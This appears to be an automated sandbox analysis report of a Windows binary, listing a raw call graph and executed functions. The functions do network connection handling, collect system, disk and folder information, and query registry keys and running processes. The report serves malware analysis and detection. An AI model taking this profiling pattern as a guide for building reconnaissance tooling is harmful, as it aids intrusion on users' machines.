67479->67477 67481 548eba 67480->67481 67481->67467 67482 1c2f17 67492 1c2f2c 67482->67492 67483 1c31d3 67486 1c315c RegEnumKeyExA 67487 1c31b2 RegCloseKey 67486->67487 67486->67492 67487->67492 67488 1c1619 2 API calls 67489 1c3046 RegOpenKeyExA 67488->67489 67490 1c3089 RegQueryValueExA 67489->67490 67489->67492 67491 1c313b RegCloseKey 67490->67491 67490->67492 67491->67492 67492->67483 67492->67486 67492->67488 67492->67491 67493 1c1619 67492->67493 67494 551360 2 API calls 67493->67494 67495 1c1645 RegOpenKeyExA 67494->67495 67495->67492 67496 1c31d7 67499 1c31f4 67496->67499 67497 1c3200 67498 1c32dc CloseHandle 67498->67497 67499->67497 67499->67498 67909 1cf7b0 67910 1cf97a 67909->67910 67913 1cf7c3 67909->67913 67911 1d0150 3 API calls 67916 1cf854 67911->67916 67913->67910 67913->67911 67914 1cf942 67915 1cf987 67914->67915 67917 211390 3 API calls 67914->67917 67946 211390 67915->67946 67916->67910 67930 1fcd80 67916->67930 67917->67914 67920 211390 3 API calls 67921 1cf9a0 67920->67921 67922 211390 3 API calls 67921->67922 67923 1cf9ac 67922->67923 67924 1cf9bb WSACloseEvent 67923->67924 67925 1c75a0 3 API calls 67924->67925 67926 1cf9df 67925->67926 67927 1c75a0 3 API calls 67926->67927 67928 1cfa12 67927->67928 67929 1c75a0 3 API calls 67928->67929 67929->67910 67931 1fd0f1 67930->67931 67937 1fcd9a 67930->67937 67931->67914 67932 1fd0e5 67933 211390 3 API calls 67932->67933 67933->67931 67935 1fd016 67955 1df6c0 9 API calls 67935->67955 67937->67932 67940 1fce6b 67937->67940 67950 1fdc30 closesocket _open localeconv localeconv 67937->67950 67940->67935 67944 1fcf4b 67940->67944 67951 1fdc30 closesocket _open localeconv localeconv 67940->67951 67941 1fd018 67954 1d7380 _open localeconv localeconv 67941->67954 67942 1d6fa0 4 API calls 67942->67944 67944->67935 67944->67941 67944->67942 67952 1fe130 closesocket _open localeconv localeconv 67944->67952 67953 1d7380 _open localeconv localeconv 67944->67953 67947 1cf98d 67946->67947 67949 21139d 67946->67949 67947->67920 67948 1c75a0 3 API calls 67948->67947 67949->67948 67950->67937 67951->67940 67952->67944 67953->67944 67954->67935 67955->67932 67500 1f8b50 67501 1f8b6b 67500->67501 67529 1f8be6 67500->67529 67502 1f8b8f 67501->67502 67503 1f8bf3 67501->67503 67501->67529 67602 1d6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 67502->67602 67533 1fa550 67503->67533 67507 1f8cd9 SleepEx 67517 1f8d14 67507->67517 67508 1f8e85 67512 1f8eae 67508->67512 67508->67529 67608 1d2a00 _open localeconv localeconv 67508->67608 67509 1f8c1f connect 67510 1f8c35 67509->67510 67590 1fa150 67510->67590 67511 1fa150 4 API calls 67521 1f8dff 67511->67521 67512->67529 67609 1c78b0 closesocket 67512->67609 67513 1f8cb2 67513->67508 67513->67511 67513->67529 67516 1f8bb5 67516->67529 67604 2050a0 _open localeconv localeconv 67516->67604 67517->67513 67518 1f8d43 67517->67518 67526 1fa150 4 API calls 67518->67526 67520 1f8c8b 67524 1f8ba1 67520->67524 67525 1f8dc8 67520->67525 67521->67508 67606 1dd090 _open localeconv localeconv 67521->67606 67524->67507 67524->67513 67524->67516 67605 1fb100 _open localeconv localeconv 67525->67605 67526->67516 67527 1f8e67 67607 204fd0 _open localeconv localeconv 67527->67607 67534 1fa575 67533->67534 67536 1fa597 67534->67536 67613 1c75e0 67534->67613 67582 1fa6d9 67536->67582 67625 1fef30 67536->67625 67538 1fa709 67540 1c78b0 4 API calls 67538->67540 67548 1fa713 67538->67548 67539 1fa63a 67545 1fa641 67539->67545 67549 1fa69b 67539->67549 67540->67548 67541 1f8bfc 67541->67509 67541->67510 67541->67513 67541->67529 67543 1fa7e5 67547 1fa811 setsockopt 67543->67547 67551 1fa87c 67543->67551 67563 1fa8ee 67543->67563 67545->67543 67634 204fd0 _open localeconv localeconv 67545->67634 67547->67551 67556 1fa83b 67547->67556 67548->67541 67633 2050a0 _open localeconv localeconv 67548->67633 67630 1dd090 _open localeconv localeconv 67549->67630 67551->67563 67637 1fb1e0 _open localeconv localeconv 67551->67637 67552 1fa6c9 67631 204f40 _open localeconv localeconv 67552->67631 67556->67551 67635 1dd090 _open localeconv localeconv 67556->67635 67557 1faf56 67559 1faf5d 67557->67559 67557->67582 67559->67548 67562 1fa150 4 API calls 67559->67562 67560 1fa86d 67636 204fd0 _open localeconv localeconv 67560->67636 67562->67548 67564 1facb8 67563->67564 67565 1fae32 67563->67565 67567 1fabb9 67563->67567 67572 1faf33 67563->67572 67563->67582 67583 1fabe1 67563->67583 67564->67567 67573 1facdc 67564->67573 67564->67582 67565->67567 67644 204fd0 _open localeconv localeconv 67565->67644 67566 1fb056 67647 1dd090 _open localeconv localeconv 67566->67647 67570 1fad45 67567->67570 67571 1fade6 67567->67571 67567->67583 67639 1f6be0 18 API calls 67567->67639 67568 1faf03 67568->67572 67645 204fd0 _open localeconv localeconv 67568->67645 67570->67571 67584 1fad5f 67570->67584 67642 1dd090 _open localeconv localeconv 67571->67642 67629 2267e0 ioctlsocket 67572->67629 67638 1dd090 _open localeconv localeconv 67573->67638 67577 1fb07b 67648 204f40 _open localeconv localeconv 67577->67648 67582->67538 67582->67548 67632 1d2a00 _open localeconv localeconv 67582->67632 67583->67566 67583->67568 67583->67582 67646 204fd0 _open localeconv localeconv 67583->67646 67585 1fadb7 67584->67585 67640 204fd0 _open localeconv localeconv 67584->67640 67641 213030 _open localeconv localeconv 67585->67641 67586 1fad01 67643 204f40 _open localeconv localeconv 67586->67643 67591 1fa15f 67590->67591 67592 1f8c4d 67590->67592 67591->67592 67593 1fa181 getsockname 67591->67593 67592->67520 67603 2050a0 _open localeconv localeconv 67592->67603 67594 1fa1f7 67593->67594 67595 1fa1d0 67593->67595 67596 1fef30 3 API calls 67594->67596 67653 1dd090 _open localeconv localeconv 67595->67653 67600 1fa20f 67596->67600 67598 1fa1eb 67655 204f40 _open localeconv localeconv 67598->67655 67600->67592 67654 1dd090 _open localeconv localeconv 67600->67654 67602->67524 67603->67520 67604->67529 67605->67513 67606->67527 67607->67508 67608->67512 67610 1c78d7 67609->67610 67611 1c78c5 67609->67611 67610->67529 67656 1c72a0 _open localeconv localeconv 67611->67656 67614 1c75ef 67613->67614 67615 1c7607 socket 67613->67615 67614->67615 67618 1c7601 67614->67618 67619 1c7643 67614->67619 67616 1c763a 67615->67616 67617 1c762b 67615->67617 67616->67536 67649 1c72a0 _open localeconv localeconv 67617->67649 67618->67615 67650 1c72a0 _open localeconv localeconv 67619->67650 67622 1c7654 67651 1ccb20 _open localeconv localeconv 67622->67651 67624 1c7674 67624->67536 67626 1fefa8 67625->67626 67627 1fef47 67625->67627 67626->67627 67652 1cc960 _open localeconv localeconv 67626->67652 67627->67539 67629->67557 67630->67552 67631->67582 67632->67538 67633->67541 67634->67543 67635->67560 67636->67551 67637->67563 67638->67586 67639->67570 67640->67585 67641->67583 67642->67586 67643->67582 67644->67567 67645->67572 67646->67583 67647->67577 67648->67582 67649->67616 67650->67622 67651->67624 67652->67627 67653->67598 67654->67598 67655->67592 67656->67610 67956 1f95b0 67957 1f95c8 67956->67957 67959 1f95fd 67956->67959 67958 1fa150 4 API calls 67957->67958 67957->67959 67958->67959 67960 1f6ab0 67961 1f6ad5 67960->67961 67962 1f6bb4 67961->67962 67964 1d6fa0 4 API calls 67961->67964 67963 275ed0 13 API calls 67962->67963 67965 1f6ba9 67963->67965 67966 1f6b54 67964->67966 67966->67962 67966->67965 67967 1f6b5d 67966->67967 67967->67965 67969 275ed0 67967->67969 67972 275a50 67969->67972 67971 275ee5 67971->67967 67973 275a58 67972->67973 67980 275ea0 67972->67980 67974 275b50 67973->67974 67983 275b88 67973->67983 67986 275a99 67973->67986 67977 275eb4 67974->67977 67978 275b7a 67974->67978 67974->67983 67975 275e96 68023 289480 closesocket 67975->68023 67981 276f10 9 API calls 67977->67981 67998 2770a0 67978->67998 67980->67971 67984 275ec2 67981->67984 67985 275cae 67983->67985 68020 276d50 localeconv localeconv 67983->68020 67984->67984 67985->67975 67988 275da1 __WSAFDIsSet 67985->67988 67994 28a920 67985->67994 68021 276d50 localeconv localeconv 67985->68021 68022 289320 closesocket 67985->68022 67986->67983 67987 275be2 __WSAFDIsSet 67986->67987 67991 2770a0 9 API calls 67986->67991 68007 276f10 67986->68007 67987->67986 67988->67985 67991->67986 67995 28a944 67994->67995 67996 28a94b 67995->67996 67997 28a977 send 67995->67997 67996->67985 67997->67985 68004 2770ae 67998->68004 68000 27717f 68001 2771a7 68000->68001 68038 276d50 localeconv localeconv 68000->68038 68001->67983 68003 27719f 68039 289320 closesocket 68003->68039 68004->68000 68004->68001 68024 28a8c0 68004->68024 68028 2771c0 68004->68028 68008 276f35 68007->68008 68014 277019 68008->68014 68066 28a870 68008->68066 68010 276f4e 68012 27702d 68010->68012 68015 276f61 68010->68015 68016 27701d 68012->68016 68070 276d50 localeconv localeconv 68012->68070 68071 289320 closesocket 68014->68071 68015->68016 68017 2771c0 7 API calls 68015->68017 68018 277082 68015->68018 68016->67986 68017->68015 68072 276d50 localeconv localeconv 68018->68072 68020->67983 68021->67985 68022->67985 68023->67980 68025 28a903 recvfrom 68024->68025 68026 28a8e6 68024->68026 68027 28a8ed 68025->68027 68026->68025 68026->68027 68027->68004 68029 2771e6 68028->68029 68031 2773e3 68029->68031 68032 2773c9 68029->68032 68037 2771f2 68029->68037 68033 27740d 68031->68033 68035 277417 68031->68035 68032->68037 68040 276050 68032->68040 68049 276d50 localeconv localeconv 68033->68049 68035->68037 68048 27c2d0 localeconv localeconv 68035->68048 68037->68004 68038->68003 68039->68001 68041 2760d9 68040->68041 68050 28aa30 68041->68050 68043 2762fc 68062 276d50 localeconv localeconv 68043->68062 68045 2764a4 68046 276050 7 API calls 68045->68046 68047 276506 68045->68047 68046->68047 68047->68037 68048->68037 68049->68037 68051 28aa5f 68050->68051 68052 28ab96 socket 68051->68052 68054 28ab75 68051->68054 68061 28ab04 68051->68061 68052->68054 68052->68061 68053 28abd0 ioctlsocket 68055 28abef 68053->68055 68054->68053 68058 28ad2e 68054->68058 68054->68061 68057 28ad0a setsockopt 68055->68057 68055->68058 68055->68061 68056 28ada0 connect 68056->68058 68057->68058 68057->68061 68058->68056 68059 28ade1 68058->68059 68058->68061 68059->68061 68063 28af70 68059->68063 68061->68043 68062->68045 68064 28af93 getsockname 68063->68064 68065 28af8d 68063->68065 68064->68065 68065->68061 68067 28a8aa recv 68066->68067 68068 28a88c 68066->68068 68067->68010 68068->68067 68069 28a893 68068->68069 68069->68010 68070->68014 68071->68016 68072->68014 67657 1c13c9 67659 1c1160 67657->67659 67661 1c13a1 67659->67661 67662 5493e0 67659->67662 67672 548a20 15 API calls 67659->67672 67663 549400 67662->67663 67671 5493f3 67662->67671 67664 549688 67663->67664 67665 5496c7 67663->67665 67669 549280 vfprintf 67663->67669 67670 549220 vfprintf 67663->67670 67663->67671 67664->67665 67664->67671 67673 549280 vfprintf 67664->67673 67674 549220 vfprintf 67665->67674 67668 5496df 67668->67659 67669->67663 67670->67663 67671->67659 67672->67659 67673->67664 67674->67668 67675 68fa30 67676 68fa5a 67675->67676 67677 68fa66 67676->67677 67678 548f70 _open 67676->67678 67679 68fa6f 67678->67679 67691 5512c0 67679->67691 67682 68faa6 67683 548f70 _open 67684 68faaf 67683->67684 67685 68fb50 67684->67685 67686 68fb06 67684->67686 67695 54b500 localeconv localeconv 67685->67695 67687 68fb44 67686->67687 67696 54b500 localeconv localeconv 67686->67696 67689 68fb79 67692 5512cc 67691->67692 67697 54e050 67692->67697 67694 5512fa 67694->67682 67694->67683 67695->67689 67696->67689 67698 54e09d localeconv localeconv 67697->67698 67707 54e503 67697->67707 67702 54e0ce 67698->67702 67699 54e18e 67700 54ed90 ungetc 67699->67700 67709 54e1a6 67699->67709 67700->67709 67701 550250 ungetc 67701->67707 67702->67699 67706 54e388 67702->67706 67702->67707 67708 54e243 67702->67708 67702->67709 67703 550742 ungetc 67703->67709 67704 5511a4 ungetc 67704->67707 67705 5508d7 ungetc 67705->67707 67706->67707 67706->67709 67713 5500b8 ungetc 67706->67713 67707->67701 67707->67704 67707->67705 67707->67708 67707->67709 67710 550e3e ungetc 67707->67710 67712 550006 ungetc 67707->67712 67714 54b1a0 islower islower 67707->67714 67708->67703 67708->67709 67709->67694 67710->67707 67712->67707 67713->67706 67714->67707 68073 1dd5e0 68074 1dd5f0 68073->68074 68075 1dd652 WSAStartup 68073->68075 68078 1dd67c 68074->68078 68080 1dd690 _open localeconv localeconv 68074->68080 68075->68074 68076 1dd664 68075->68076 68079 1dd5fa 68080->68079 67715 1fb400 67716 1fb40b 67715->67716 67717 1fb425 67715->67717 67720 1c7770 67716->67720 67718 1fb421 67721 1c77b6 recv 67720->67721 67722 1c7790 67720->67722 67724 1c77a3 67721->67724 67730 1c77d4 67721->67730 67722->67721 67723 1c7799 67722->67723 67723->67724 67725 1c77db 67723->67725 67731 1c72a0 _open localeconv localeconv 67724->67731 67732 1c72a0 _open localeconv localeconv 67725->67732 67728 1c77ec 67733 1ccb20 _open localeconv localeconv 67728->67733 67730->67718 67731->67730 67732->67728 67733->67730 67734 1fe400 67735 1fe412 67734->67735 67739 1fe459 67734->67739 67736 1fe422 67735->67736 67758 213030 _open localeconv localeconv 67735->67758 67759 2209d0 _open localeconv localeconv 67736->67759 67741 1fe4a8 67739->67741 67744 1fe495 67739->67744 67746 1fb5a0 67739->67746 67740 1fe42b 67760 1f68b0 closesocket _open localeconv localeconv 67740->67760 67744->67741 67745 1fb5a0 3 API calls 67744->67745 67745->67741 67747 1fb5d2 67746->67747 67748 1fb5c0 67746->67748 67747->67744 67748->67747 67749 1fb713 67748->67749 67752 1fb626 67748->67752 67762 204f40 _open localeconv localeconv 67749->67762 67751 1fb65a 67751->67747 67753 1fb72b 67751->67753 67754 1fb737 67751->67754 67752->67747 67752->67751 67752->67753 67752->67754 67761 2050a0 _open localeconv localeconv 67752->67761 67753->67747 67763 2050a0 _open localeconv localeconv 67753->67763 67754->67747 67764 2050a0 _open localeconv localeconv 67754->67764 67758->67736 67759->67740 67760->67739 67761->67752 67762->67747 67763->67747 67764->67747 67765 1ff100 67766 1ff1b8 67765->67766 67768 1ff11f 67765->67768 67767 1fff1a 67808 200c80 _open localeconv localeconv 67767->67808 67768->67766 67770 1ff2a3 67768->67770 67776 1ff603 67768->67776 67784 1ff240 67768->67784 67800 204f40 _open localeconv localeconv 67770->67800 67772 200045 67772->67766 67775 20010d 67772->67775 67780 20004d 67772->67780 67811 2050a0 _open localeconv localeconv 67772->67811 67773 1ff80d 67778 20015e 67775->67778 67812 2050a0 _open localeconv localeconv 67775->67812 67776->67767 67776->67772 67776->67773 67777 20008a 67776->67777 67794 200d30 _open localeconv localeconv 67776->67794 67798 2050a0 _open localeconv localeconv 67776->67798 67806 1cfa50 _open localeconv localeconv 67776->67806 67807 204fd0 _open localeconv localeconv 67776->67807 67810 204f40 _open localeconv localeconv 67777->67810 67778->67780 67813 2050a0 _open localeconv localeconv 67778->67813 67814 204f40 _open localeconv localeconv 67780->67814 67781 1fff5b 67781->67766 67809 2050a0 _open localeconv localeconv 67781->67809 67784->67766 67801 1c7310 _open localeconv localeconv 67784->67801 67788 1ff491 67788->67776 67803 1c7310 _open localeconv localeconv 67788->67803 67792 1ff3ce 67792->67766 67792->67788 67802 2050a0 _open localeconv localeconv 67792->67802 67794->67776 67795 1ff5b9 67805 1cfa50 _open localeconv localeconv 67795->67805 67797 1ff50d 67797->67766 67797->67795 67804 2050a0 _open localeconv localeconv 67797->67804 67798->67776 67800->67766 67801->67792 67802->67788 67803->67797 67804->67795 67805->67776 67806->67776 67807->67776 67808->67781 67809->67766 67810->67766 67811->67775 67812->67778 67813->67780 67814->67766 67815 1fb3c0 67816 1fb3ee 67815->67816 67817 1fb3cb 67815->67817 67819 1c76a0 4 API calls 67817->67819 67821 1f9290 67817->67821 67818 1fb3ea 67819->67818 67822 1c76a0 4 API calls 67821->67822 67823 1f92e5 67822->67823 67824 1f93c3 67823->67824 67826 1f92f3 67823->67826 67829 1f9392 67824->67829 67835 1dd090 _open localeconv localeconv 67824->67835 67825 1f93be 67825->67818 67826->67829 67830 1f9335 WSAIoctl 67826->67830 67828 1f93f7 67836 204f40 _open localeconv localeconv 67828->67836 67829->67825 67837 2050a0 _open localeconv localeconv 67829->67837 67830->67829 67833 1f9366 67830->67833 67833->67829 67834 1f9371 setsockopt 67833->67834 67834->67829 67835->67828 67836->67829 67837->67825

                                          Executed Functions

                                          Function 001FF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                          • API String ID: 0-1590685507
                                          • Opcode ID: 31ac787cec5443bbf8ad3c2c5b2f9a368823d39c03cd21d788e4ec432d9fb363
                                          • Instruction ID: 069d6763cb6f7f6941e99395987fbe2215dd83c1a02f7c6dbaea677989b4863e
                                          • Opcode Fuzzy Hash: 31ac787cec5443bbf8ad3c2c5b2f9a368823d39c03cd21d788e4ec432d9fb363
                                          • Instruction Fuzzy Hash: 09C2B431A043499FD724CF28C484B6AB7E1BF84314F05C66DED999B2A2D7B1ED85CB81
                                          Function 001C255D Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 282fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSystemInfo.KERNELBASE ref: 001C2579
                                          • GlobalMemoryStatusEx.KERNELBASE ref: 001C25CC
                                          • GetDriveTypeA.KERNELBASE ref: 001C2647
                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 001C267E
                                          • KiUserCallbackDispatcher.NTDLL ref: 001C27E2
                                          • SHGetKnownFolderPath.SHELL32 ref: 001C286D
                                          • FindFirstFileW.KERNELBASE ref: 001C28F8
                                          • FindNextFileW.KERNELBASE ref: 001C291F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                          • String ID: 7z$@$}z
                                          • API String ID: 2066228396-2556700916
                                          • Opcode ID: 6c981d745bdcbdfa50ce134a1c44e7d9279b8933dbbddfe1b12f14ea0581de7e
                                          • Instruction ID: 010ce07d880eac6b93e85e8baf0f8cfc5ab255416407b9be0189ea044d36a9ba
                                          • Opcode Fuzzy Hash: 6c981d745bdcbdfa50ce134a1c44e7d9279b8933dbbddfe1b12f14ea0581de7e
                                          • Instruction Fuzzy Hash: E5D1C5B49043099FCB40EF68C98569EBBF5BF89344F10896DE898DB301E7349A94DF52
                                          Function 001C29FF Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 321registryfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1271 1c29ff-1c2a2f FindFirstFileA 1272 1c2a38 1271->1272 1273 1c2a31-1c2a36 1271->1273 1274 1c2a3d-1c2a91 call 691e50 call 691ee0 RegOpenKeyExA 1272->1274 1273->1274 1279 1c2a9a 1274->1279 1280 1c2a93-1c2a98 1274->1280 1281 1c2a9f-1c2b0c call 691e50 call 691ee0 CharUpperA call 548da0 1279->1281 1280->1281 1289 1c2b0e-1c2b13 1281->1289 1290 1c2b15 1281->1290 1291 1c2b1a-1c2b92 call 691e50 call 691ee0 call 548e80 call 548e70 1289->1291 1290->1291 1300 1c2bcc-1c2c66 QueryFullProcessImageNameA CloseHandle call 548da0 1291->1300 1301 1c2b94-1c2ba3 1291->1301 1311 1c2c6f 1300->1311 1312 1c2c68-1c2c6d 1300->1312 1304 1c2ba5-1c2bae 1301->1304 1305 1c2bb0-1c2bc0 call 548e68 1301->1305 1304->1300 1309 1c2bc5-1c2bca 1305->1309 1309->1300 1309->1301 1313 1c2c74-1c2ce9 call 691e50 call 691ee0 call 548e80 call 548e70 1311->1313 1312->1313 1322 1c2dcf-1c2e1c call 691e50 call 691ee0 CloseHandle 1313->1322 1323 1c2cef-1c2d49 call 548bb0 call 548da0 1313->1323 1333 1c2e23-1c2e2e 1322->1333 1334 1c2d99-1c2dad 1323->1334 1335 1c2d4b-1c2d63 call 548da0 1323->1335 1336 1c2e37 1333->1336 1337 1c2e30-1c2e35 1333->1337 1334->1322 1335->1334 1343 1c2d65-1c2d7d call 548da0 1335->1343 1339 1c2e3c-1c2ed6 call 691e50 call 691ee0 1336->1339 1337->1339 1352 1c2ed8-1c2ee1 1339->1352 1353 1c2eea 1339->1353 1343->1334 1349 1c2d7f-1c2d97 call 548da0 1343->1349 1349->1334 1357 1c2daf-1c2dc9 call 548e68 1349->1357 1352->1353 1355 1c2ee3-1c2ee8 1352->1355 1356 1c2eef-1c2f16 call 691e50 call 691ee0 1353->1356 1355->1356 1357->1322 1357->1323
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                          • String ID: 0$wz
                                          • API String ID: 2406880114-1130733895
                                          • Opcode ID: 3feea410164af276a78a63b385f81e400298f959fba8a9b7270ac613084d841d
                                          • Instruction ID: bb4ba0fc015ae5fb0100c6b946403e66dfbeac4d2c537c0ff3aac22547f614a5
                                          • Opcode Fuzzy Hash: 3feea410164af276a78a63b385f81e400298f959fba8a9b7270ac613084d841d
                                          • Instruction Fuzzy Hash: 81E104B09053098FCB50EF68D98469DBBF5AF95344F10896DE898DB340EB78DA94CF42
                                          Function 001D05B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1759 1d05b0-1d05b7 1760 1d05bd-1d05d4 1759->1760 1761 1d07ee 1759->1761 1762 1d05da-1d05e6 1760->1762 1763 1d07e7-1d07ed 1760->1763 1762->1763 1764 1d05ec-1d05f0 1762->1764 1763->1761 1765 1d07c7-1d07cc 1764->1765 1766 1d05f6-1d0620 call 1d7350 call 1c70b0 1764->1766 1765->1763 1771 1d066a-1d068c call 1fdec0 1766->1771 1772 1d0622-1d0624 1766->1772 1778 1d07d6-1d07e3 call 1d7380 1771->1778 1779 1d0692-1d06a0 1771->1779 1773 1d0630-1d0655 call 1c70d0 call 1d03c0 call 1d7450 1772->1773 1799 1d07ce 1773->1799 1800 1d065b-1d0668 call 1c70e0 1773->1800 1778->1763 1782 1d06f4-1d06f6 1779->1782 1783 1d06a2-1d06a4 1779->1783 1785 1d06fc-1d06fe 1782->1785 1786 1d07ef-1d082b call 1d3000 1782->1786 1788 1d06b0-1d06e4 call 1d73b0 1783->1788 1791 1d072c-1d0754 1785->1791 1803 1d0a2f-1d0a35 1786->1803 1804 1d0831-1d0837 1786->1804 1788->1778 1798 1d06ea-1d06ee 1788->1798 1795 1d075f-1d078b 1791->1795 1796 1d0756-1d075b 1791->1796 1814 1d0791-1d0796 1795->1814 1815 1d0700-1d0703 1795->1815 1801 1d075d 1796->1801 1802 1d0707-1d0719 WSAEventSelect 1796->1802 1798->1788 1805 1d06f0 1798->1805 1799->1778 1800->1771 1800->1773 1810 1d0723-1d0726 1801->1810 1802->1778 1809 1d071f 1802->1809 1806 1d0a3c-1d0a52 1803->1806 1807 1d0a37-1d0a3a 1803->1807 1812 1d0839-1d084c call 1d6fa0 1804->1812 1813 1d0861-1d087e 1804->1813 1805->1782 1806->1778 1817 1d0a58-1d0a81 call 1d2f10 1806->1817 1807->1806 1809->1810 1810->1786 1810->1791 1824 1d0a9c-1d0aa4 1812->1824 1825 1d0852 